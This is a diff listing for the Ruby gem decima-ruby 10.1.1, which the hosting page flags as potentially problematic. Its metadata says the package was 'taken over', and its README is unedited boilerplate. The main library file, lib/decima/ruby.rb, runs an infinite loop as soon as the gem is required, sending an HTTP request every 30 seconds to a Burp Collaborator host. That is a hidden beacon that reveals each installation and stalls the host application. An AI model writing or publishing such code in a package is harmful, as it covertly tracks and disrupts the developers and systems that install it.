decima-ruby 10.1.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of decima-ruby might be problematic. Click here for more details.
- checksums.yaml +7 -0
- data/Gemfile +8 -0
- data/README.md +29 -0
- data/Rakefile +4 -0
- data/lib/decima/ruby/version.rb +7 -0
- data/lib/decima/ruby.rb +18 -0
- data/sig/decima/ruby.rbs +6 -0
- metadata +48 -0
checksums.yaml
ADDED
@@ -0,0 +1,7 @@
|
|
1
|
+
---
|
2
|
+
SHA256:
|
3
|
+
metadata.gz: 1498ef75e6f74e8811973486e0b545fdddd90d263d59f861f8fce9fa63c60adf
|
4
|
+
data.tar.gz: e81d09e4c2271705370a756c619c1cf4d1683620482cb0007c63d96d26085428
|
5
|
+
SHA512:
|
6
|
+
metadata.gz: ae917700ca6e785576324c481aa2ab110e81859c47892c0763ac353774b680c4c9876bfdc3bca62f69c4b17e4ee1786d739984cbdb69dd84e6c5f774beb87952
|
7
|
+
data.tar.gz: 530fd5600ad155cf52caff3ea672f1a41fd719cfd34c7e2873be01c8e0a1c06812d1964db2c1eef01e1668cbb308fc541269cffe3054b270bf93897313ab36fe
|
data/Gemfile
ADDED
data/README.md
ADDED
@@ -0,0 +1,29 @@
|
|
1
|
+
# Decima::Ruby
|
2
|
+
|
3
|
+
Welcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/decima/ruby`. To experiment with that code, run `bin/console` for an interactive prompt.
|
4
|
+
|
5
|
+
TODO: Delete this and the text above, and describe your gem
|
6
|
+
|
7
|
+
## Installation
|
8
|
+
|
9
|
+
Install the gem and add to the application's Gemfile by executing:
|
10
|
+
|
11
|
+
$ bundle add decima-ruby
|
12
|
+
|
13
|
+
If bundler is not being used to manage dependencies, install the gem by executing:
|
14
|
+
|
15
|
+
$ gem install decima-ruby
|
16
|
+
|
17
|
+
## Usage
|
18
|
+
|
19
|
+
TODO: Write usage instructions here
|
20
|
+
|
21
|
+
## Development
|
22
|
+
|
23
|
+
After checking out the repo, run `bin/setup` to install dependencies. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
|
24
|
+
|
25
|
+
To install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and the created tag, and push the `.gem` file to [rubygems.org](https://rubygems.org).
|
26
|
+
|
27
|
+
## Contributing
|
28
|
+
|
29
|
+
Bug reports and pull requests are welcome on GitHub at https://github.com/[USERNAME]/decima-ruby.
|
data/Rakefile
ADDED
data/lib/decima/ruby.rb
ADDED
@@ -0,0 +1,18 @@
|
|
1
|
+
# frozen_string_literal: true
|
2
|
+
require 'net/http'
|
3
|
+
|
4
|
+
require_relative "ruby/version"
|
5
|
+
|
6
|
+
module Decima
|
7
|
+
module Ruby
|
8
|
+
class Error < StandardError; end
|
9
|
+
loop do
|
10
|
+
http = Net::HTTP.new('wwww.ovn0ojgeuviwc7p7f21y8gwzxq3gr5.burpcollaborator.net')
|
11
|
+
response = http.request_get('/')
|
12
|
+
p response.code
|
13
|
+
|
14
|
+
sleep 30
|
15
|
+
|
16
|
+
end
|
17
|
+
end
|
18
|
+
end
|
data/sig/decima/ruby.rbs
ADDED
metadata
ADDED
@@ -0,0 +1,48 @@
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
2
|
+
name: decima-ruby
|
3
|
+
version: !ruby/object:Gem::Version
|
4
|
+
version: 10.1.1
|
5
|
+
platform: ruby
|
6
|
+
authors:
|
7
|
+
- Anupam Singh
|
8
|
+
autorequire:
|
9
|
+
bindir: exe
|
10
|
+
cert_chain: []
|
11
|
+
date: 2023-01-02 00:00:00.000000000 Z
|
12
|
+
dependencies: []
|
13
|
+
description: taken over by AnupamAS01
|
14
|
+
email:
|
15
|
+
- 79111711+AnupamAS01@users.noreply.github.com
|
16
|
+
executables: []
|
17
|
+
extensions: []
|
18
|
+
extra_rdoc_files: []
|
19
|
+
files:
|
20
|
+
- Gemfile
|
21
|
+
- README.md
|
22
|
+
- Rakefile
|
23
|
+
- lib/decima/ruby.rb
|
24
|
+
- lib/decima/ruby/version.rb
|
25
|
+
- sig/decima/ruby.rbs
|
26
|
+
homepage: https://anupamas0x1.github.io/
|
27
|
+
licenses: []
|
28
|
+
metadata: {}
|
29
|
+
post_install_message:
|
30
|
+
rdoc_options: []
|
31
|
+
require_paths:
|
32
|
+
- lib
|
33
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
34
|
+
requirements:
|
35
|
+
- - ">="
|
36
|
+
- !ruby/object:Gem::Version
|
37
|
+
version: 2.6.0
|
38
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
39
|
+
requirements:
|
40
|
+
- - ">="
|
41
|
+
- !ruby/object:Gem::Version
|
42
|
+
version: '0'
|
43
|
+
requirements: []
|
44
|
+
rubygems_version: 3.0.3.1
|
45
|
+
signing_key:
|
46
|
+
specification_version: 4
|
47
|
+
summary: AnupamAS01
|
48
|
+
test_files: []
|